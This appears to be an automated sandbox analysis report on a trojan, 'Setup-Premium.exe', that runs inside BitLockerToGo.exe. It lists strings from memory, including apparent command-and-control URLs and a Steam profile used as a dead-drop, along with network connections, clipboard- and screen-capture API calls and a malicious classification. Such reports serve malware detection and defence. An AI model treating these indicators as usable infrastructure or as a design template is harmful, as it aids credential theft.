                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/-
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
                  Source: BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiM
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/E
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/apii
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-managy
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-managyPHPgg
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.5:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49757 version: TLS 1.2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00435320 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00435320
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00435320 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00435320
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004354A0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,StretchBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,DeleteObject,2_2_004354A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043A36A2_2_0043A36A
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00410F132_2_00410F13
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004010002_2_00401000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004420102_2_00442010
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004350E02_2_004350E0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F0A02_2_0041F0A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004270A02_2_004270A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004331602_2_00433160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004441202_2_00444120
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004081B02_2_004081B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004292C02_2_004292C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041D2F02_2_0041D2F0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042A2F32_2_0042A2F3
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040135D2_2_0040135D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D3302_2_0040D330
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004203A02_2_004203A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004013A72_2_004013A7
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040A4102_2_0040A410
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042D4162_2_0042D416
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004114362_2_00411436
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004224C02_2_004224C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004394D02_2_004394D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004214902_2_00421490
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004424B02_2_004424B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004114362_2_00411436
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043E6502_2_0043E650
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004016552_2_00401655
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004266DB2_2_004266DB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004036E02_2_004036E0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F74C2_2_0040F74C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004397302_2_00439730
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004417C02_2_004417C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004427C02_2_004427C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004077D02_2_004077D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004107EB2_2_004107EB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004117F12_2_004117F1
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042B7992_2_0042B799
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041D8C82_2_0041D8C8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004428802_2_00442880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042E9402_2_0042E940
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004429602_2_00442960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00406A302_2_00406A30
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040BA802_2_0040BA80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040AAB02_2_0040AAB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00441B402_2_00441B40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040EBD02_2_0040EBD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00443B802_2_00443B80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00416CC12_2_00416CC1
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00408C9E2_2_00408C9E
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042BCB02_2_0042BCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00442CB02_2_00442CB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00410D402_2_00410D40
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00421D602_2_00421D60
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00406DD02_2_00406DD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438DEA2_2_00438DEA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404DF02_2_00404DF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AD8C2_2_0042AD8C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00426E682_2_00426E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00443E202_2_00443E20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00426E2C2_2_00426E2C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040DE3F2_2_0040DE3F
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00409EC02_2_00409EC0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00439EA02_2_00439EA0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041CEB02_2_0041CEB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040AF702_2_0040AF70
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00440F742_2_00440F74
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00432F302_2_00432F30
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040C570 appears 72 times
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040DD20 appears 190 times
                  Source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup-Premium.exe
                  Source: Setup-Premium.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@11/8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043A1B0 CoCreateInstance,2_2_0043A1B0
                  Source: Setup-Premium.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Setup-Premium.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Setup-Premium.exeString found in binary or memory: github.com/go-openapi/loads
                  Source: Setup-Premium.exeString found in binary or memory: 2github.com/docker/docker-credential-helpers/client
                  Source: Setup-Premium.exeString found in binary or memory: 2github.com/klauspost/compress/zstd/internal/xxhash2github.com/docker/docker-credential-helpers/client
                  Source: Setup-Premium.exeString found in binary or memory: 7github.com/docker/docker-credential-helpers/credentials
                  Source: Setup-Premium.exeString found in binary or memory: StacktraceKey)json:"stacktraceKey" yaml:"stacktraceKey"7github.com/spf13/viper/internal/encoding/javaproperties7*map.bucket[protowire.Number]protoreflect.ExtensionType7*struct { F uintptr; X0 *int; X1 proto.MarshalOptions }7*func(context.Context, float64, ...metric.RecordOption)7github.com/docker/docker-credential-helpers/credentials7*func(kem.PublicKey, []uint8) ([]uint8, []uint8, error)7github.com/cloudflare/circl/pke/kyber/kyber512/internal7github.com/cloudflare/circl/pke/kyber/kyber768/internal8*func(string, ...nats.WatchOpt) (nats.KeyWatcher, error)8*func(*nats.ObjectStoreConfig) (nats.ObjectStore, error)8*func(string, []uint8, time.Duration) (*nats.Msg, error)8*struct { F uintptr; X0 *nats.js; X1 string; X2 string }
                  Source: Setup-Premium.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWboringcrypto: .WithoutCancel.WithDeadline(zero parameterinvalid syntax1907348632812595367431640625createLogEntrysearchLogQuerysignedTreeHeadintegratedTimedata truncatedinternal errorContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eof{$} not at endempty wildcardinvalid methodparsing %q: %wunknown error unknown code: Not Acceptable\.+*?()|[]{}^$x509ignoreCN=1validate.rulesreserved_rangefield_presenceunsafe.Pointer on zero Valuereflect.Value.unknown methodbad record MACunexpected EOF.in-addr.arpa.unknown mode: Accept-CharsetDkim-SignatureControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWModule32FirstWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunreachable: /log/filter.go/log/helper.go
                  Source: Setup-Premium.exeString found in binary or memory: invalid Trailer key already registeredProxy-Authorizationunknown status codeunexpected InstFailBLOB_UPLOAD_INVALIDjava_multiple_filescc_generic_servicespy_generic_servicesdeprecation_warningreflect.Value.Bytesreflect.Value.Fieldreflect.Value.Indexreflect.Value.Slicereflect.Value.Clearreflect.AppendSlice are not comparablerevoked certificateexpired certificateunknown certificateunknown cipher typeinvalid MAC addresscriterion too shortinvalid URL escape missing ']' in hostQueryServiceConfigWSetTokenInformationCreatePseudoConsoleDisconnectNamedPipeGetDiskFreeSpaceExWGetLargePageMinimumGetOverlappedResultGetSystemDirectoryWMultiByteToWideCharResizePseudoConsoleRtlAddFunctionTableGetForegroundWindowLoadKeyboardLayoutWGetFileVersionInfoWCanadian_AboriginalKhitan_Small_Scriptfile already existsfile does not existfile already closedexec: canceling Cmdinvalid blocklen %dinvalid data len %dmultipartmaxheaders20060102150405Z0700.docker/config.jsonmodulus must be oddContent-DispositionRawValueEncodeValueRawValueDecodeValuemail: no angle-addrconsumeAddrSpec: %qconsumePhrase: [%s]invalid UUID formatinvalid character 'while parsing a tagPrerelease is emptyno public key foundmime: no media typeevictCount overflow "(),/:;<=>?@[]\{}untrusted comment:
                  Source: Setup-Premium.exeString found in binary or memory: lock: lock countbad system huge page sizearena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWx509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malformed signaturecontext deadline exceededjson: Unexpected key typereflect.Value.OverflowIntjson: unsupported value: not at beginning of valueecdsa: invalid public keyerror during PEM decoding2910383045673370361328125proposedContent.verifierscontent.payloadHash.valuefailure generating objectmissing signature contentmissing publicKey contentunknown Go type for sliceexplicit tag has no childinvalid object identifierhttp: invalid cookie namehttp2: Request.URI is niltext/plain; charset=utf-8http: invalid Cookie.Namehttp2: Framer %p: read %vframe_data_pad_byte_shortframe_settings_has_streamframe_headers_zero_streamframe_headers_pad_too_bigframe_priority_bad_lengthhttp2: invalid header: %vstrict-transport-securityhttp2: unsupported schemeread_frame_unexpected_eof{...} wildcard not at endhttp: invalid Host headerport number out of range invalid username/passwordmissing envelope propertybytes,1071,opt,name=rulesleading_detached_commentsreflect: Bits of nil Typereflect.StructOf: field "reflect.Value.SetMapIndextls: protocol is shutdownno answer from DNS serverno suitable address foundunexpected '[' in addressunexpected ']' in addressContent-Transfer-Encodingnet/url: invalid userinfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorSetSecurityDescriptorDaclSetSecurityDescriptorSaclFindNextVolumeMountPointWFindVolumeMountPointCloseQueryInformationJobObjectNtQueryInformationProcessSetupDiCallClassInstallerSetupDiGetDevicePropertyWSetupDiGetSelectedDriverWSetupDiSetSelectedDriverW with too many arguments inconsistent poll.fdMutexGODEBUG: can not enable "unsupported type %T, a %smail: unclosed angle-addrmail: leading dot in atomcharset not supported: %q^(?:[0-9]{9}X|[0-9]{10})$%s must be of type %s: %q%s should be less than %v%d error(s) decoding:
